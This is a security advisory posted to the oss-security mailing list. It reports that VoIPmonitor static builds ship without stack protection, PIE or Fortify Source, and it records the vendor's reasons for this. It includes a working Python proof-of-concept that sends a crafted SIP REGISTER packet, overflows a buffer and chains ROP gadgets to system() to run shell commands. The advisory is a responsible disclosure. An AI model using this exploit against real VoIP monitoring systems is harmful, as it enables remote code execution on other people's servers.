[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] =?UTF-8?Q?ES2021-04:_VoIPmonitor_static_builds_are_compiled_without_any_?= =?UTF-8?Q?
From: "Sandro Gauci" <sandro () enablesecurity ! com>
Date: 2021-03-15 12:50:26
Message-ID: e835517e-f199-4cae-a9cb-33c89a77c916 () www ! fastmail ! com
[Download RAW message or body]
# VoIPmonitor static builds are compiled without any standard memory corruption protection
- Fixed versions: N/A
- Enable Security Advisory: \
https://github.com/EnableSecurity/advisories/tree/master/ES2021-04-voipmonitor-staticbuild-memory-corruption-protection
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
- Report date: 2021-02-10 & 2021-02-13
- Enable Security advisory: 2021-03-15
## Description
The binaries available for download at <https://www.voipmonitor.org/download> are built without \
any memory corruption protection in place. The following is output from the tool \
`hardening-check`:
```
hardening-check voipmonitor:
Position Independent Executable: no, normal executable!
Stack protected: no, not found!
Fortify Source functions: unknown, no protectable libc functions used
Read-only relocations: no, not found!
Immediate binding: no, not found!
Stack clash protection: unknown, no -fstack-clash-protection instructions found
Control flow integrity: unknown, no -fcf-protection instructions found!
```
When stack protection together with Fortify Source and other protection mechanisms are in \
place, exploitation of memory corruption vulnerabilities normally results in a program crash \
instead of leading to remote code execution. Most modern compilation systems create executable \
binaries with these features built-in by default. When these features are not used, attackers \
may easily exploit memory corruption vulnerabilities, such as buffer overflows, to run \
arbitrary code. In this advisory we will demonstrate how a buffer overflow reported in a \
separate advisory, could be abused to run arbitrary code because of the lack of standard memory \
corruption protection in the static build releases of VoIPmonitor.
The vendor has explained that:
> we are not going to enable the protection in the static builds as the speed is critical on \
> many installations
> Our static build also uses tcmalloc (recommended version) which is required for high \
> packet/second processing as the libc allocator is not fast enough especially on NUMA systems. \
> For high packet/second traffic FORTIFY_SOURCE can introduce a lot of additional CPU cycles. \
> If using custom builds with FORTIFY_SOURCE - they should compare if the sniffer did not \
> introduced higher CPU usage.
While we understand the vendor's position, we are issuing an advisory to ensure that end users \
can make informed risk-based decisions.
## Impact
The lack of standard memory corruption protection mechanisms means that such vulnerabilities \
may lead to remote code execution.
## How to reproduce the issue
1. Execute the static build of VoIPmonitor (such as \
https://www.voipmonitor.org/current-stable-sniffer-static-64bit.tar.gz) 2. Start the live \
sniffer from the VOIPMonitor GUI or via the manager on port 5029 3. Execute the following \
Python program so that VOIPMonitor is able to capture the packet 4. Observe the payload being \
executed by the `voipmonitor` process, i.e. the following:
- current user is printed due to execution of the `whoami` command
- `h4x0r was here` is also printed
- a file has been created in `/tmp/woot`
```python
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload_size=32607
# Pad with As
payload = b'A' * 703
payload_size-=len(payload)
# Write system payload
cmd=b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload+=cmd
payload_size-=len(cmd)
# Pad some more so that we can overwrite the save_packet_sql's function return address
payload += b'A' * payload_size
# Call a ROP gadged that increments the value of the RDI register,
# which will now point to the value set by cmd
payload += struct.pack('<Q', 0x0000000000b222f1)
# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)
# Return to exit() to exit gracefully
payload += struct.pack('<Q', 0xf60a20)
msg=b'REGISTER %s SIP/2.0\r\n' % (payload)
msg+=b'Via: SIP/2.0/UDP 192.168.1.132:35393;rport;branch=z9hG4bK-kwtTkrdNAO2Wvw0v\r\n'
msg+=b'Max-Forwards: 70\r\n'
msg+=b'From: <sip:85861710@demo.sipvicious.pro>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+=b'To: <sip:85861710@demo.sipvicious.pro>\r\n'
msg+=b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+=b'CSeq: 1 REGISTER\r\n'
msg+=b'Contact: <sip:85861710@192.168.1.132:35393;transport=udp>\r\n'
msg+=b'Expires: 60\r\n'
msg+=b'Content-Length: 0\r\n'
msg+=b'\r\n'
s.sendto(msg, ('167.71.58.84', 5060))
```
## Solution and recommendations
Users who would like to have standard memory corruption protection for VoIPmonitor should \
compile the binaries themselves and apply their own upgrades rather than using the upgrade \
feature from the VoIPmonitor GUI / sensors page.
We recommended the following to the vendor:
> Our recommendation is that standard memory corruption protection be switched on by default in \
> the official binary build of VoIPmonitor. If there are specific requirements for specific \
> systems that require such features to be switched off, then additional binaries should be \
> offered, with adequate documentation of the risks involved.
> Do note that memory corruption vulnerabilities should also be addressed and fixed even if \
> security features, such as Fortify, are used.
## Acknowledgements
Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very \
quick responses and explanations with regards to this security issue.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) develops offensive security tools and \
provides quality penetration testing to help protect your real-time communications systems \
against attack.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on \
currently available information. Use of the information constitutes acceptance for use in an AS \
IS condition. There are no warranties with regard to this information. Neither the author nor \
the publisher accepts any liability for any direct, indirect, or consequential loss or damage \
arising from use of, or reliance on, this information.
## Disclosure policy
This report is subject to Enable Security's vulnerability disclosure policy which can be found \
at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.
--
Sandro Gauci, CEO at Enable Security GmbH
Register of Companies: AG Charlottenburg HRB 173016 B
Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany
PGP/Encrypted comms: https://keybase.io/sandrogauci
Our blog: https://www.rtcsec.com
Other points of contact: https://enablesecurity.com/#contact-us
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic